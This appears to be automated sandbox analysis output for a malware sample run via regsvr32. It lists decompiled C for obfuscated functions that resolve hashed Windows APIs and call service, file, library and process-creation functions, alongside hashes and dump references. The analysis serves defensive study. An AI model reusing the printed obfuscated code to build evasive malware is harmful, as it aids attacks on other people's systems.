                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 5d15bad4580734018d1f3f08c0c09e4fe4e6c2849388406a142c327b69296f5f
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: 061185B2D01218BBDB04DFA5C8498DEBFB6EF41300F10C189FA18A7241D7B55B219F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00238E38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 238e38-238ee4 call 23c98a call 237f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00238E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				void* _t46;
				signed int _t48;
				int _t53;

				_push(_a16);
				_t53 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023C98A(_t37);
				_v12 = 0x1c994a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff2161;
				_v12 = _v12 | 0xd2ae04c7;
				_v12 = _v12 ^ 0xd2e10dca;
				_v8 = 0x3225a3;
				_v8 = _v8 + 0xb485;
				_t48 = 0x24;
				_v8 = _v8 / _t48;
				_v8 = _v8 + 0x1169;
				_v8 = _v8 ^ 0x000adbd5;
				_v16 = 0x918fbd;
				_v16 = _v16 * 0x4a;
				_v16 = _v16 ^ 0x2a1cf10f;
				E00237F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
				return _t46;
			}










                                                                                                                0x00238e3f
                                                                                                                0x00238e42
                                                                                                                0x00238e44
                                                                                                                0x00238e47
                                                                                                                0x00238e4a
                                                                                                                0x00238e4e
                                                                                                                0x00238e4f
                                                                                                                0x00238e54
                                                                                                                0x00238e5e
                                                                                                                0x00238e64
                                                                                                                0x00238e6b
                                                                                                                0x00238e72
                                                                                                                0x00238e79
                                                                                                                0x00238e80
                                                                                                                0x00238e8c
                                                                                                                0x00238e94
                                                                                                                0x00238e9c
                                                                                                                0x00238ea3
                                                                                                                0x00238eaa
                                                                                                                0x00238ebc
                                                                                                                0x00238ebf
                                                                                                                0x00238ecf
                                                                                                                0x00238ede
                                                                                                                0x00238ee4

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00238EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: f6fab88ecfed5c6883a55fd550d32bd0b3bd33a8383fd0165bb7645a739871b3
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 581122B1E01208FBEF05DFA4DA4A8DEBFB6EB05314F10C089E914A6250E7B55B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00237BC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 237bc6-237c79 call 23c98a call 237f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00237BC6(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t42;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a4);
				E0023C98A(_t42);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0xa8f244;
				_v16 = 0x845cf1;
				_t54 = 0x49;
				_v16 = _v16 / _t54;
				_v16 = _v16 | 0x150b5070;
				_v16 = _v16 ^ 0x15045549;
				_v12 = 0xcbfb15;
				_v12 = _v12 ^ 0x1a866322;
				_v12 = _v12 + 0xffff3502;
				_v12 = _v12 ^ 0x1a48e6f8;
				_v8 = 0xe2385a;
				_v8 = _v8 | 0xfdf9d9f4;
				_t55 = 0x6e;
				_v8 = _v8 / _t55;
				_v8 = _v8 + 0xffffa480;
				_v8 = _v8 ^ 0x02430dde;
				E00237F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
				_t52 = DeleteFileW(_a4); // executed
				return _t52;
			}













                                                                                                                0x00237bcc
                                                                                                                0x00237bd1
                                                                                                                0x00237bd6
                                                                                                                0x00237bdd
                                                                                                                0x00237be3
                                                                                                                0x00237bea
                                                                                                                0x00237bf6
                                                                                                                0x00237bfb
                                                                                                                0x00237c00
                                                                                                                0x00237c07
                                                                                                                0x00237c0e
                                                                                                                0x00237c15
                                                                                                                0x00237c1c
                                                                                                                0x00237c23
                                                                                                                0x00237c2a
                                                                                                                0x00237c31
                                                                                                                0x00237c3b
                                                                                                                0x00237c43
                                                                                                                0x00237c4b
                                                                                                                0x00237c52
                                                                                                                0x00237c69
                                                                                                                0x00237c74
                                                                                                                0x00237c79

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 00237C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: f25e2573c6b48e95a906c36cea62911d0d7874800a3877e54f4a803cf226c0f9
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: 2D115BB1D00248BFDB18DFE5D94AA9EBBB1EB40304F208198E41477290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024ED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 24ed7b-24ee13 call 23c98a call 237f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0024ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0023C98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E00237F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x0024ed82
                                                                                                                0x0024ed85
                                                                                                                0x0024ed87
                                                                                                                0x0024ed8b
                                                                                                                0x0024ed8c
                                                                                                                0x0024ed91
                                                                                                                0x0024ed9b
                                                                                                                0x0024eda4
                                                                                                                0x0024edab
                                                                                                                0x0024edb7
                                                                                                                0x0024edbc
                                                                                                                0x0024edc4
                                                                                                                0x0024edcc
                                                                                                                0x0024edd4
                                                                                                                0x0024eddb
                                                                                                                0x0024ede2
                                                                                                                0x0024ede9
                                                                                                                0x0024eded
                                                                                                                0x0024ee04
                                                                                                                0x0024ee0d
                                                                                                                0x0024ee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0024EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: ae49f76f56203dfd171bd5e40fc950816d5551feac6f4d65044ea94fd64d32a9
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 470139B1D00208BBDB18DFA4C94A9DEBFB5EF45314F10C08AE914A6241E7B25B658F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00234A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00234A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023C98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
				_v8 = _v8 ^ 0x7ff151f0;
				E00237F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x00234aa4
                                                                                                                0x00234aa7
                                                                                                                0x00234aa9
                                                                                                                0x00234aac
                                                                                                                0x00234aad
                                                                                                                0x00234aae
                                                                                                                0x00234ab3
                                                                                                                0x00234aba
                                                                                                                0x00234ac3
                                                                                                                0x00234aca
                                                                                                                0x00234ad1
                                                                                                                0x00234ad8
                                                                                                                0x00234adf
                                                                                                                0x00234ae6
                                                                                                                0x00234aed
                                                                                                                0x00234af4
                                                                                                                0x00234afb
                                                                                                                0x00234b02
                                                                                                                0x00234b16
                                                                                                                0x00234b19
                                                                                                                0x00234b20
                                                                                                                0x00234b30
                                                                                                                0x00234b39
                                                                                                                0x00234b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 565290f482b33d4840b19e243af68192c7914bb6422126c8c557a597b03c6d30
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: DF1148B1C11208FFCB08DFA4DA46ADEBBB4FB00311F20C188E415B6251D3704B149F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00247B25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00247B25() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t31;

				_v16 = 0x340970;
				_t2 =  &_v16; // 0x340970
				_t31 = 0x26;
				_v16 =  *_t2 / _t31;
				_v16 = _v16 ^ 0x000e30ec;
				_v8 = 0x85299d;
				_v8 = _v8 + 0xa54a;
				_v8 = _v8 ^ 0x35a74c3e;
				_v8 = _v8 ^ 0x3521895a;
				_v12 = 0xcc7db5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000f948d;
				E00237F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
				ExitProcess(0);
			}







                                                                                                                0x00247b2b
                                                                                                                0x00247b34
                                                                                                                0x00247b39
                                                                                                                0x00247b41
                                                                                                                0x00247b49
                                                                                                                0x00247b50
                                                                                                                0x00247b57
                                                                                                                0x00247b5e
                                                                                                                0x00247b65
                                                                                                                0x00247b6c
                                                                                                                0x00247b73
                                                                                                                0x00247b77
                                                                                                                0x00247b8e
                                                                                                                0x00247b98

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00247B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: dd5e578786a35f68670e5b65eeed0d612ddb8fd065e8215f9a7b9387aa6f9947
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 51F08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B189F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024A50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0024A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E0023C98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E00237F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x0024a511
                                                                                                                0x0024a516
                                                                                                                0x0024a519
                                                                                                                0x0024a51c
                                                                                                                0x0024a51f
                                                                                                                0x0024a520
                                                                                                                0x0024a523
                                                                                                                0x0024a526
                                                                                                                0x0024a529
                                                                                                                0x0024a52c
                                                                                                                0x0024a52f
                                                                                                                0x0024a532
                                                                                                                0x0024a536
                                                                                                                0x0024a537
                                                                                                                0x0024a53c
                                                                                                                0x0024a546
                                                                                                                0x0024a54f
                                                                                                                0x0024a552
                                                                                                                0x0024a559
                                                                                                                0x0024a55d
                                                                                                                0x0024a561
                                                                                                                0x0024a568
                                                                                                                0x0024a574
                                                                                                                0x0024a579
                                                                                                                0x0024a57e
                                                                                                                0x0024a585
                                                                                                                0x0024a58c
                                                                                                                0x0024a593
                                                                                                                0x0024a59e
                                                                                                                0x0024a5aa
                                                                                                                0x0024a5b3
                                                                                                                0x0024a5bb
                                                                                                                0x0024a5cb
                                                                                                                0x0024a5e4
                                                                                                                0x0024a5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0024A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: ffbc411fb934d6efd9f18a591a8e61235854e61457ee7b171c0325687f6af4fe
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: D821C572901108FBDF05DFE5D94A9DEBFB6EF48314F108149F91866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0023816B Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0023816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t45;
				int _t52;
				struct _STARTUPINFOW* _t56;

				_push(_a64);
				_t56 = __ecx;
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0023C98A(_t45);
				_v12 = 0x5160ce;
				_v12 = _v12 ^ 0x33bed16b;
				_v12 = _v12 + 0xffffe3b5;
				_v12 = _v12 | 0x3554987c;
				_v12 = _v12 ^ 0x37f1882e;
				_v8 = 0x57d154;
				_v8 = _v8 + 0xffff861a;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0012f1da;
				_v16 = 0x81ccd1;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x000c22df;
				E00237F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
				return _t52;
			}









                                                                                                                0x00238173
                                                                                                                0x00238178
                                                                                                                0x0023817a
                                                                                                                0x0023817d
                                                                                                                0x00238180
                                                                                                                0x00238183
                                                                                                                0x00238186
                                                                                                                0x00238187
                                                                                                                0x0023818a
                                                                                                                0x0023818b
                                                                                                                0x0023818e
                                                                                                                0x0023818f
                                                                                                                0x00238192
                                                                                                                0x00238195
                                                                                                                0x00238196
                                                                                                                0x00238199
                                                                                                                0x0023819c
                                                                                                                0x0023819f
                                                                                                                0x002381a0
                                                                                                                0x002381a1
                                                                                                                0x002381a6
                                                                                                                0x002381b0
                                                                                                                0x002381bc
                                                                                                                0x002381c3
                                                                                                                0x002381ca
                                                                                                                0x002381d1
                                                                                                                0x002381d8
                                                                                                                0x002381ef
                                                                                                                0x002381f2
                                                                                                                0x002381f6
                                                                                                                0x002381fd
                                                                                                                0x00238204
                                                                                                                0x00238208
                                                                                                                0x0023820c
                                                                                                                0x0023821c
                                                                                                                0x00238236
                                                                                                                0x0023823d

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 00238236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 2875409e06d7524c936fa2df438a774fd70f73c3d399472faf43f7bcb5e2d76d
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 3421C072801248BBCF159F95CD0ACCEBFBAEB89714F108098FA1562121D3729A65EF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00233466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00233466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E0023C98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E00237F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x00233473
                                                                                                                0x00233486
                                                                                                                0x0023348b
                                                                                                                0x00233495
                                                                                                                0x002334a1
                                                                                                                0x002334a5
                                                                                                                0x002334ac
                                                                                                                0x002334b3
                                                                                                                0x002334ba
                                                                                                                0x002334be
                                                                                                                0x002334c5
                                                                                                                0x002334dc
                                                                                                                0x002334df
                                                                                                                0x002334ef
                                                                                                                0x002334fe
                                                                                                                0x00233505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002334FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: a593693c1ca1b2dfb0d7fae86d7c87a0d132d5dbb8089cf1e34952918201f7ec
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 941136B1805248BBCF11DFA6DD0ACAFBFB8EB85704F108098F914A2210D3714B24DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024EAB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0024EAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				intOrPtr* _t40;
				void* _t41;

				E0023C98A(_t35);
				_v28 = 0xe6c580;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x2d161b;
				_v8 = _v8 + 0xffffdf88;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xc1e5ff2b;
				_v8 = _v8 ^ 0xc1e88dee;
				_v16 = 0xd78d92;
				_v16 = _v16 ^ 0xcf4c3c1d;
				_v16 = _v16 ^ 0xcf92c072;
				_v12 = 0x4f9c9d;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0xffff6ea2;
				_v12 = _v12 ^ 0x00061ead;
				_t40 = E00237F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t41;
			}












                                                                                                                0x0024eacf
                                                                                                                0x0024ead4
                                                                                                                0x0024eade
                                                                                                                0x0024eae6
